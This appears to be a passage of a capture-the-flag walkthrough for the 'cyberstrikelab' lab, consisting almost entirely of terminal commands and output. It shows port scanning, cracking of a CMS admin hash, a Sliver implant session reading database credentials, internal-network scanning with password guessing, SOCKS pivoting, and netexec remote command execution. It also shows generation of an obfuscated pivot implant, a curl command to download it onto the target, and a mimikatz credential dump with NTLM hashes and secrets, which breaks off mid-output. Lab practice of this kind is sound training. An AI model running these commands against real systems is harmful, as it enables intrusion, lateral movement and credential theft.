ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ gogo -i 172.5.33.6 -p all -ev[*] gogo: , 2025-05-22 14:10.48[*] Current goroutines: 1000, Version Level: 1,Exploit: auto, PortSpray: false , 2025-05-22 14:10.48[*] Start task 172.5.33.6 ,total ports: 368 , mod: default , 2025-05-22 14:10.48[*] too much ports , only show top 100 ports: 8017,9095,8099,7010,11210,442,6001,8004,4848,8014,8763,10001,7005,8092,7000,8002,8007,3873,20882,7007,2379,9300,81,444,8000,7001,icmp,16201,22,84,8070,8880,8873,9990,8870,9097,8024,6984,33066,7890,9092,8222,23,50020,4430,8003,9443,15011,8300,9000,8015,9081,8878,9096,8899,10022,18090,11211,1001,7443,8765,8093,16000,winrm,901,70,3001,8012,5005,10250,13389,83,8091,27019,8085,8881,18088,8887,4443,8848,10002,143,8096,5672,10255,1099,21,2100,80,9004,1435,8087,7080,9094,9070,8882,443,1080,5601,1311...... , 2025-05-22 14:10.48[*] Default Scan is expected to take 4 seconds , 2025-05-22 14:10.48[+] winrm://172.5.33.6:5985winrm:Windows 10 1607/Server2016(10.0.14393):defaultWIN-784BAKDI0AC/WIN-784BAKDI0AC [winrm] WIN-784BAKDI0AC/WIN-784BAKDI0AC[+] wmi://172.5.33.6:135wmi:default/ [wmi] /[+] http://172.5.33.6:80Apache/2.4.39(Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02poweredby:php/5.6.9||php||mod_fcgid [200] HTTP/1.1 200[+] tcp://172.5.33.6:3306mysql:guess [open][*] Alived: 4, Total: 368 , 2025-05-22 14:11.00[*] Time consuming: 12.361886167s , 2025-05-22 14:11.00

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line<?php# CmsEasy Enterprise Content Management System# Copyright (C) CmsEasy Co.,Ltd (https://www.CmsEasy.cn). All rights reserved.define('_VERSION','7_7_5_20211012_UTF8');define('_VERNUM','7.7.5.20211012');define('_VERCODE','7753');# This program is an open source system, commercial use, please consciously to purchase commercial license.# Copyright (C) CmsEasy Co., Ltd. (https://www.CmsEasy.cn). All rights reserved.

ounter(line{"userid":"1","username":"admin","password":"a66abb5684c45962d887564f08346e8d","nickname":"u7ba1u7406u5458","groupid":"2","checked":"1","qqlogin":"","alipaylogin":"","wechatlogin":"","avatar":"","userip":"","state":"0","qq":"1111","e_mail":"[email protected]","address":"admin","tel":"admin","question":"","answer":"","intro":"","point":"0","introducer":"0","regtime":"0","sex":"","isblock":"0","isdelete":"0","headimage":"/html/upload/images/201907/15625455867367.png","integration":"0","couponidnum":"17:0:1","collect":"2,4,3,46,14,73","menoy":"100.07","adddatetime":"2021-09-01 00:00:00","notifiid":"","templatelang":"cn","adminlang":"cn","buyarchive":"","adminlangdomain":"","templatelangdomain":"","expired_time":"0"}

ounter(linea66abb5684c45962d887564f08346e8d:admin123456

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linesliver (lab9) > cat config_database.php<?php if (!defined('ROOT')) exit('Can't Access !'); return array ('database'=>array('hostname'=>'localhost',//MySQL服务器'database'=>'eyou',//数据库名'user'=>'eyou',//数据库用户名'password'=>'cyberstrike@2024',//数据库密码'prefix'=>'cmseasy_',//数据库表前缀'encoding'=>'utf8',//编码'type' => 'mysqli',//数据库类型),);sliver (lab9) > pwd[*] C:phpstudy_proWWWconfig

ounter(lineounter(lineounter(lineounter(lineounter(linesliver (lab9) > cat c:/flag.txt[*] Supplied pattern c:/flag.txt matched file c:flag.txtgo-flag{8EC18759-1F45-4C34-9743-95DAABCA5CC1}

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linesliver (lab9) > ifconfig+--------------------------------------+| 以太网实例 2                         |+--------------------------------------+| # | IP Addresses | MAC Address       |+---+--------------+-------------------+| 2 | 10.6.6.10/24 | a0:0c:91:78:30:0d |+--------------------------------------++----------------------------------------+| 以太网实例 1                           |+----------------------------------------+|  # | IP Addresses  | MAC Address       |+----+---------------+-------------------+| 11 | 172.5.33.6/24 | 80:98:cb:ad:6d:db |+----------------------------------------+3 adapters not shown.

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linePS C:phpstudy_proWWWconfig> .fscan2.exe -h 10.6.6.10/24 -p 1-65535.fscan2.exe -h 10.6.6.10/24 -p 1-65535   ___                              _  / _      ___  ___ _ __ __ _  ___| | __ / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <____/     |___/___|_|  __,_|___|_|_                     fscan version: 2.0.0[*] 扫描类型: all, 目标端口: 1-65535[*] 开始信息扫描...[*] CIDR范围: 10.6.6.0-10.6.6.255[*] 已生成IP范围: 10.6.6.0 - 10.6.6.255[*] 已解析CIDR 10.6.6.10/24 -> IP范围 10.6.6.0-10.6.6.255[*] 最终有效主机数量: 256[+] 目标 10.6.6.10       存活 (ICMP)[+] 目标 10.6.6.55       存活 (ICMP)[+] 目标 10.6.6.88       存活 (ICMP)[+] ICMP存活主机数量: 3[*] 共解析 65535 个有效端口[+] 端口开放 10.6.6.88:139[+] 端口开放 10.6.6.55:139[+] 端口开放 10.6.6.10:139[+] 端口开放 10.6.6.88:135[+] 端口开放 10.6.6.55:135[+] 端口开放 10.6.6.10:135[+] 端口开放 10.6.6.55:88[+] 端口开放 10.6.6.55:80[+] 端口开放 10.6.6.10:80[+] 端口开放 10.6.6.55:53[+] 端口开放 10.6.6.55:389[+] 端口开放 10.6.6.10:445[+] 端口开放 10.6.6.55:445[+] 端口开放 10.6.6.88:445[+] 端口开放 10.6.6.55:464[+] 端口开放 10.6.6.55:593[+] 端口开放 10.6.6.55:636[+] 端口开放 10.6.6.55:3268[+] 端口开放 10.6.6.55:3269[+] 端口开放 10.6.6.10:3306[+] 端口开放 10.6.6.88:3389[+] 端口开放 10.6.6.10:5985[+] 端口开放 10.6.6.88:5985[+] 端口开放 10.6.6.55:5985[+] 端口开放 10.6.6.55:9389

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linePS C:phpstudy_proWWWconfig> .fscan2.exe -h 10.6.6.10/24 -o 10.txt.fscan2.exe -h 10.6.6.10/24 -o 10.txt   ___                              _  / _      ___  ___ _ __ __ _  ___| | __ / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <____/     |___/___|_|  __,_|___|_|_                     fscan version: 2.0.0[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880[*] 开始信息扫描...[*] CIDR范围: 10.6.6.0-10.6.6.255[*] 已生成IP范围: 10.6.6.0 - 10.6.6.255[*] 已解析CIDR 10.6.6.10/24 -> IP范围 10.6.6.0-10.6.6.255[*] 最终有效主机数量: 256[+] 目标 10.6.6.10       存活 (ICMP)[+] 目标 10.6.6.55       存活 (ICMP)[+] 目标 10.6.6.88       存活 (ICMP)[+] ICMP存活主机数量: 3[*] 共解析 218 个有效端口[+] 端口开放 10.6.6.10:3306[+] 端口开放 10.6.6.88:445[+] 端口开放 10.6.6.55:445[+] 端口开放 10.6.6.10:445[+] 端口开放 10.6.6.88:139[+] 端口开放 10.6.6.55:139[+] 端口开放 10.6.6.10:139[+] 端口开放 10.6.6.88:135[+] 端口开放 10.6.6.55:135[+] 端口开放 10.6.6.10:135[+] 端口开放 10.6.6.55:88[+] 端口开放 10.6.6.55:80[+] 端口开放 10.6.6.10:80[+] 存活端口数量: 13[*] 开始漏洞扫描...[!] 扫描错误 10.6.6.10:3306 - Error 1130: Host 'WIN-784BAKDI0AC' is not allowed to connect to this MySQL server[*] NetInfo[*] 10.6.6.55   [->] DC   [->] 10.6.6.55[*] NetInfo[*] 10.6.6.10   [->] WIN-784BAKDI0AC   [->] 172.5.33.6   [->] 10.6.6.10[*] 网站标题 http://10.6.6.10          状态码:200 长度:77272  标题:中文网页标题[!] 扫描错误 10.6.6.10:445 - 无法确定目标是否存在漏洞[*] NetInfo[*] 10.6.6.88   [->] cyberweb   [->] 10.6.6.88[!] 扫描错误 10.6.6.55:139 - netbios error[!] 扫描错误 10.6.6.55:88 - Get "http://10.6.6.55:88": read tcp 10.6.6.10:49285->10.6.6.55:88: wsarecv: An existing connection was forcibly closed by the remote host.[*] OsInfo 10.6.6.55(Windows Server 2016 Standard 14393)[!] 扫描错误 10.6.6.10:139 - netbios error[!] 扫描错误 10.6.6.55:80 - Get "http://10.6.6.55": context deadline exceeded (Client.Timeout exceeded while awaiting headers)[*] OsInfo 10.6.6.88(Windows Server 2016 Standard 14393)[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393[+] 扫描已完成: 13/13[*] 扫描结束,耗时: 1m20.5048977s

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linePS C:phpstudy_proWWWconfig> cat result.txtcat result.txt[+] 绔彛寮€鏀?10.6.6.88:139[+] 绔彛寮€鏀?10.6.6.55:139[+] 绔彛寮€鏀?10.6.6.10:139[+] 绔彛寮€鏀?10.6.6.88:135[+] 绔彛寮€鏀?10.6.6.55:135[+] 绔彛寮€鏀?10.6.6.10:135[+] 绔彛寮€鏀?10.6.6.55:88[+] 绔彛寮€鏀?10.6.6.55:80[+] 绔彛寮€鏀?10.6.6.10:80[+] 绔彛寮€鏀?10.6.6.55:53[+] 绔彛寮€鏀?10.6.6.55:389[+] 绔彛寮€鏀?10.6.6.10:445[+] 绔彛寮€鏀?10.6.6.55:445[+] 绔彛寮€鏀?10.6.6.88:445[+] 绔彛寮€鏀?10.6.6.55:464[+] 绔彛寮€鏀?10.6.6.55:593[+] 绔彛寮€鏀?10.6.6.55:636[+] 绔彛寮€鏀?10.6.6.55:3268[+] 绔彛寮€鏀?10.6.6.55:3269[+] 绔彛寮€鏀?10.6.6.10:3306[+] 绔彛寮€鏀?10.6.6.88:3389[+] 绔彛寮€鏀?10.6.6.10:5985[+] 绔彛寮€鏀?10.6.6.88:5985[+] 绔彛寮€鏀?10.6.6.55:5985[+] 绔彛寮€鏀?10.6.6.55:9389[+] 绔彛寮€鏀?10.6.6.10:47001[+] 绔彛寮€鏀?10.6.6.88:47001[+] 绔彛寮€鏀?10.6.6.88:49664[+] 绔彛寮€鏀?10.6.6.10:49665[+] 绔彛寮€鏀?10.6.6.10:49664[+] 绔彛寮€鏀?10.6.6.55:49670[+] 绔彛寮€鏀?10.6.6.10:49670[+] 绔彛寮€鏀?10.6.6.88:49669[+] 绔彛寮€鏀?10.6.6.55:49669[+] 绔彛寮€鏀?10.6.6.10:49669[+] 绔彛寮€鏀?10.6.6.88:49668[+] 绔彛寮€鏀?10.6.6.55:49668[+] 绔彛寮€鏀?10.6.6.55:49667[+] 绔彛寮€鏀?10.6.6.10:49668[+] 绔彛寮€鏀?10.6.6.88:49667[+] 绔彛寮€鏀?10.6.6.10:49667[+] 绔彛寮€鏀?10.6.6.88:49666[+] 绔彛寮€鏀?10.6.6.10:49666[+] 绔彛寮€鏀?10.6.6.88:49665[+] 绔彛寮€鏀?10.6.6.55:49680[+] 绔彛寮€鏀?10.6.6.88:49671[+] 绔彛寮€鏀?10.6.6.55:49671[+] 绔彛寮€鏀?10.6.6.88:49670[+] 绔彛寮€鏀?10.6.6.55:49708[+] 绔彛寮€鏀?10.6.6.55:49725[*] NetInfo[*] 10.6.6.10   [->] WIN-784BAKDI0AC   [->] 172.5.33.6   [->] 10.6.6.10[*] 缃戠珯鏍囬 http://10.6.6.10          鐘舵€佺爜:200 闀垮害:77272  鏍囬:涓枃缃戦〉鏍囬[*] NetInfo[*] 10.6.6.55   [->] DC   [->] 10.6.6.55[*] NetInfo[*] 10.6.6.88   [->] cyberweb   [->] 10.6.6.88[*] 缃戠珯鏍囬 http://10.6.6.55          鐘舵€佺爜:200 闀垮害:703    鏍囬:IIS Windows Server[*] 缃戠珯鏍囬 http://10.6.6.88:5985     鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found[*] 缃戠珯鏍囬 http://10.6.6.88:47001    鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found[*] 缃戠珯鏍囬 http://10.6.6.55:5985     鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393[*] OsInfo 10.6.6.55(Windows Server 2016 Standard 14393)[*] OsInfo 10.6.6.88(Windows Server 2016 Standard 14393)[+] [鍙戠幇婕忔礊] 鐩爣: http://10.6.6.55  婕忔礊绫诲瀷: poc-yaml-active-directory-certsrv-detect  婕忔礊鍚嶇О:  璇︾粏淇℃伅: %!s(<nil>)[*] 缃戠珯鏍囬 http://10.6.6.10:5985     鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found[*] 缃戠珯鏍囬 http://10.6.6.10:47001    鐘舵€佺爜:404 闀垮害:315    鏍囬:Not Found[+] RDP 10.6.6.88:3389:administrator qwe123!@#

ounter(lineounter(lineounter(lineounter(linesliver (lab9) > socks5 start[*] Started SOCKS5 127.0.0.1 1081⚠️  In-band SOCKS proxies can be a little unstable depending on protocol

ounter(lineounter(lineounter(lineounter(lineounter(line❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'whoami'SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEBadministrator:qwe123!@# (Pwn3d!)SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexecSMB         10.6.6.88       445    CYBERWEB         cyberwebadministrator

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'dir c:'SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEBadministrator:qwe123!@# (Pwn3d!)SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexecSMB         10.6.6.88       445    CYBERWEB         ╟²╢»╞≈ C ╓╨╡─╛φ├╗╙╨▒Ω╟⌐íúSMB         10.6.6.88       445    CYBERWEB         ╛φ╡─╨≥┴╨║┼╩╟ F667-4B31SMB         10.6.6.88       445    CYBERWEB         c: ╡──┐┬╝SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:36                45 flag.txtSMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:55    <DIR>          PerfLogsSMB         10.6.6.88       445    CYBERWEB         2018/02/03  03:38    <DIR>          Program FilesSMB         10.6.6.88       445    CYBERWEB         2016/07/16  21:23    <DIR>          Program Files (x86)SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:58    <DIR>          smbSMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:07    <DIR>          UsersSMB         10.6.6.88       445    CYBERWEB         2025/02/19  18:11    <DIR>          WindowsSMB         10.6.6.88       445    CYBERWEB         1 ╕÷╬─╝■             45 ╫╓╜┌SMB         10.6.6.88       445    CYBERWEB         6 ╕÷─┐┬╝ 31,290,617,856 ┐╔╙├╫╓╜┌❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'type c:flag.txt'SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEBadministrator:qwe123!@# (Pwn3d!)SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexecSMB         10.6.6.88       445    CYBERWEB         go-flag{0A433C09-0529-4205-848D-6DADCE311646}

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linesliver (lab9) > pivots ID   Protocol   Bind Address   Number Of Pivots==== ========== ============== ==================  1   TCP        0.0.0.0:9898                  0sliver (lab9) > background[*] Background ...sliver > generate --tcp-pivot 10.6.6.10:9898 --os windows[*] Generating new windows/amd64 implant binary[*] Symbol obfuscation is enabled[*] Build completed in 16s[*] Implant saved to /Users/a/Desktop/tool/sliver/LARGE_POWER.exe

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'curl 10.6.6.10/LARGE_POWER.exe -o  c:smbLARGE_POWER.exe'SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEBadministrator:qwe123!@# (Pwn3d!)SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexecSMB         10.6.6.88       445    CYBERWEB         'curl' ▓╗╩╟─┌▓┐╗≥═Γ▓┐├ⁿ┴εú¼╥▓▓╗╩╟┐╔╘╦╨╨╡─│╠╨≥SMB         10.6.6.88       445    CYBERWEB         ╗≥┼·┤ª└φ╬─╝■íú

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linec:smb>mimikatz.exe "sekurlsa::debug " "sekurlsa::logonpasswords" "exit"> pssword.txt  .#####.   mimikatz 2.1.1(x64) #17763 Dec  9 2018 23:56:50 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ##  / ##       > http://blog.gentilkiwi.com/mimikatz '## v ##'       Vincent LE TOUX             ( [email protected] )  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/mimikatz(commandline) # sekurlsa::debugERROR mimikatz_doLocal ; "debug" command of "sekurlsa" module not found !Module :sekurlsaFull name :SekurLSA moduleDescription :Some commands to enumerate credentials...             msv  -  Lists LM & NTLM credentials         wdigest  -  Lists WDigest credentials        kerberos  -  Lists Kerberos credentials           tspkg  -  Lists TsPkg credentials         livessp  -  Lists LiveSSP credentials             ssp  -  Lists SSP credentials  logonPasswords  -  Lists all available providers credentials         process  -  Switch (or reinit) to LSASS process  context        minidump  -  Switch (or reinit) to LSASS minidump context             pth  -  Pass-the-hash          krbtgt  -  krbtgt!     dpapisystem  -  DPAPI_SYSTEM secret           trust  -  Antisocial      backupkeys  -  Preferred Backup Master keys         tickets  -  List Kerberos tickets           ekeys  -  List Kerberos Encryption Keys           dpapi  -  List Cached MasterKeys         credman  -  List Credentials Managermimikatz(commandline) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 1780709(00000000:001b2be5)Session           : Interactive from 3User Name         : DWM-3Domain         : Window ManagerLogon Server   : (null)Logon Time     : 2025/5/22 16:58:36SID               : S-1-5-90-0-3msv : [00000003] Primary * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest : * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : CYBERWEB$ * Domain   : cyberstrikelab.com * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 1780585(00000000:001b2b69)Session           : Interactive from 3User Name         : DWM-3Domain         : Window ManagerLogon Server   : (null)Logon Time     : 2025/5/22 16:58:36SID               : S-1-5-90-0-3msv : [00000003] Primary * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest : * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : CYBERWEB$ * Domain   : cyberstrikelab.com * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 51034(00000000:0000c75a)Session           : Interactive from 1User Name         : DWM-1Domain         : Window ManagerLogon Server   : (null)Logon Time     : 2025/5/22 7:28:15SID               : S-1-5-90-0-1msv : [00000003] Primary * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest : * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : CYBERWEB$ * Domain   : cyberstrikelab.com * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 996(00000000:000003e4)Session           : Service from 0User Name         : CYBERWEB$Domain         : CYBERSTRIKELABLogon Server   : (null)Logon Time     : 2025/5/22 7:28:09SID               : S-1-5-20msv : [00000003] Primary * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest : * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : cyberweb$ * Domain   : CYBERSTRIKELAB.COM * Password : (null)ssp :credman :Authentication Id : 0 ; 306483(00000000:0004ad33)Session           : Interactive from 0User Name         : cslabDomain         : CYBERSTRIKELABLogon Server   : DCLogon Time     : 2025/5/22 15:31:45SID               : S-1-5-21-4286488488-1212600890-1604239976-1104msv : [00000003] Primary * Username : cslab * Domain   : CYBERSTRIKELAB * NTLM     : 39b0e84f13872f51efb3b8ba5018c517 * SHA1     : fa6a465532224cc4f1fa5094424bf219d25b7463 * DPAPI : 432dfb0f990f2cc292b2fd09468aab5etspkg :wdigest : * Username : cslab * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : cslab * Domain   : CYBERSTRIKELAB.COM * Password : (null)ssp :credman :Authentication Id : 0 ; 131588(00000000:00020204)Session           : Interactive from 1User Name         : AdministratorDomain         : CYBERWEBLogon Server   : CYBERWEBLogon Time     : 2025/5/22 7:29:19SID               : S-1-5-21-332097019-2215467117-1557799732-500msv : [00000003] Primary * Username : Administrator * Domain   : CYBERWEB * NTLM     : c377ba8a4dd52401bc404dbe49771bbc * SHA1     : d9ac14100bf4e36f6807dd3c29051983b2d58d3dtspkg :wdigest : * Username : Administrator * Domain   : CYBERWEB * Password : (null)kerberos : * Username : Administrator * Domain   : CYBERWEB * Password : (null)ssp :credman :Authentication Id : 0 ; 997(00000000:000003e5)Session           : Service from 0User Name         : LOCAL SERVICEDomain         : NT AUTHORITYLogon Server   : (null)Logon Time     : 2025/5/22 7:28:16SID               : S-1-5-19msv :tspkg :wdigest : * Username : (null) * Domain   : (null) * Password : (null)kerberos : * Username : (null) * Domain   : (null) * Password : (null)ssp :credman :Authentication Id : 0 ; 51057(00000000:0000c771)Session           : Interactive from 1User Name         : DWM-1Domain         : Window ManagerLogon Server   : (null)Logon Time     : 2025/5/22 7:28:15SID               : S-1-5-90-0-1msv : [00000003] Primary * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8 * SHA1     : 